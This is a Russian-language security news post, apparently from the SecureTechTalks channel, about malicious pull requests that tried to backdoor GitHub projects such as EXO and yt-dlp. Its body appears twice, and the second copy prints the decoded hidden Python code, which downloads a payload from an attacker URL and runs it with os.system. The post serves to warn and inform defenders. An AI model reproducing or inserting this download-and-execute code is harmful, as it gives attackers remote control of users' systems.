⚠️ GitHub атакован: вредоносные коммиты с бэкдорами
👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.
🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.
🧩 Механика
🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:
💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.
🔍 Расследование атак
👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.
🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.
🛡️ Рекомендации для защиты
1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.
🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.
Stay secure and read SecureTechTalks 📚
#GitHub #Киберугрозы #ОткрытыйКод #Безопасность
👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.
🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.
🧩 Механика
🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.
🔍 Расследование атак
👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.
🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.
🛡️ Рекомендации для защиты
1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.
🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.
Stay secure and read SecureTechTalks 📚
#GitHub #Киберугрозы #ОткрытыйКод #Безопасность